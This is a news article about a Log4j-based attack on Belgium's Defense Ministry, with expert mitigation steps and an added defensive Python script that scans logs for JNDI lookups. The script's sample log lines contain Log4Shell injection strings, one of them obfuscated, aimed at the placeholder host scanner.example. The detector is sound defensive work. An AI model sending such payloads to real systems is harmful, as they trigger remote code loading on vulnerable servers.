Threat actors have exploited a vulnerability in Log4j software to wage a cyber-attack on Belgium’s Defense Ministry.
The attack began on December 16 and was confirmed by Belgium’s Ministry of Defense on Monday.
Speaking to the AFP in Brussels on Tuesday, Belgian military spokesman Commander Olivier Séverin said that the incident had caused damage to services that were connected to the internet, paralyzing part of the ministry’s activities.
He added that five days after the attack began, analysis of the incident was still being carried out and the process of restoring disrupted services remained ongoing.
Séverin did not shed any light on who may have been responsible for the cyber-attack.
A spokesperson for Belgian Defense Minister Ludivine Dedonder said that “the ministry’s teams have been working hard in past days to secure its networks” and that the Belgian government will continue to invest in cybersecurity defenses.
Log4j is a widely used Java-based logging library that records application and system activity. Security teams around the world have been working to secure their systems after multiple vulnerabilities were discovered in Log4j earlier this month.
Mike Saxton, chief technologist at Booz Allen and director of Federal Threat Hunt and Digital Forensics and Incident Response (DFIR), urged organizations to act now to mitigate the Log4j vulnerability.
“Most immediately, organizations must establish and see through a plan that begins with the following: 1) Implementing sensor blocks; 2) Disabling Log4J; 3) Identifying and patching vulnerable versions; 4) Disabling JNDI lookups; 5) Disabling remote codebases; 6) Performing scans with updated vulnerability management templates; 7) Performing searches and analysis of all security logs for evidence of enumeration or compromise; 8) Consolidating, communicating, and disseminating updated threat intel associated with Log4j; 9) Tracking all remediation and mitigation efforts and tasks; 10) Continuing to apply up-to-date blocking measures; 11) Monitoring LDAP traffic; and 12) Moving vulnerable systems behind additional firewalls,” said Saxton.
He added: “This list may seem overwhelming, but it should be viewed as a template rather than a checklist that organizations can follow.”
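Step 7 of Saxton's list, searching security logs for evidence of enumeration, is the one a defender can start on immediately. The script below is an added example, not part of the article and not Booz Allen's tooling: it normalizes the nested `${lower:...}`, `${upper:...}` and `${...:-default}` lookup syntax that Log4j evaluates, so that a JNDI lookup split across several nested lookups still surfaces as a literal `${jndi:` string, then flags the matching lines. The access-log lines are constructed for the example; the host `scanner.example` and the IP addresses are placeholders.

```python
import re
from typing import List, Tuple

# Innermost ${...} lookup: one with no nested braces inside it.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup is visible once the nested lookups have been folded away.
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _fold(m: "re.Match") -> str:
    """Evaluate the lookup types commonly used to split up the word 'jndi'.

    Unknown lookups (including jndi itself) are returned unchanged so that
    normalize() terminates and the final string still carries the marker.
    """
    expr = m.group(1)
    if ":-" in expr:                       # ${key:-default} -> default
        return expr.split(":-", 1)[1]
    prefix, sep, rest = expr.partition(":")
    key = prefix.strip().lower()
    if sep and key == "lower":             # ${lower:X} -> x
        return rest.lower()
    if sep and key == "upper":             # ${upper:x} -> X
        return rest.upper()
    return m.group(0)


def normalize(text: str, max_rounds: int = 16) -> str:
    """Fold nested lookups from the inside out until nothing changes."""
    for _ in range(max_rounds):
        folded = INNER_LOOKUP.sub(_fold, text)
        if folded == text:
            return text
        text = folded
    return text


def scan_lines(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (1-based line number, normalized line) for every line carrying a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        norm = normalize(line)
        if JNDI.search(norm):
            hits.append((n, norm))
    return hits


# Constructed sample access-log lines (Combined Log Format); not real traffic.
SAMPLE_LOGS = [
    '203.0.113.7 - - [16/Dec/2021:09:12:01 +0100] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [16/Dec/2021:09:12:05 +0100] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://scanner.example/a}"',
    '198.51.100.9 - - [16/Dec/2021:09:13:40 +0100] "GET /login HTTP/1.1" 404 0 "-" '
    '"${${lower:j}${::-n}di:ldap://scanner.example/b}"',
    '198.51.100.9 - - [16/Dec/2021:09:14:02 +0100] "GET /health HTTP/1.1" 200 2 "-" "curl/7.79"',
]

if __name__ == "__main__":
    for lineno, norm in scan_lines(SAMPLE_LOGS):
        print(f"line {lineno}: {norm}")
```

Run it against any text log (web server access logs, reverse-proxy logs, application logs that echo request headers) by reading the file into `scan_lines`. The normalization step matters: a plain case-insensitive search for `${jndi:` misses the third sample line, while the folded form catches it, and a search for the bare word `jndi` would flag harmless mentions in logs that never contained a lookup. A hit is evidence of enumeration, not of compromise; Saxton's steps 3 and 4 (patching and disabling JNDI lookups) are what decide whether the probe did anything.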
In the long term, Saxton advised organizations to move to a persistent threat hunt model and to work under the assumption that their vulnerable assets will be breached.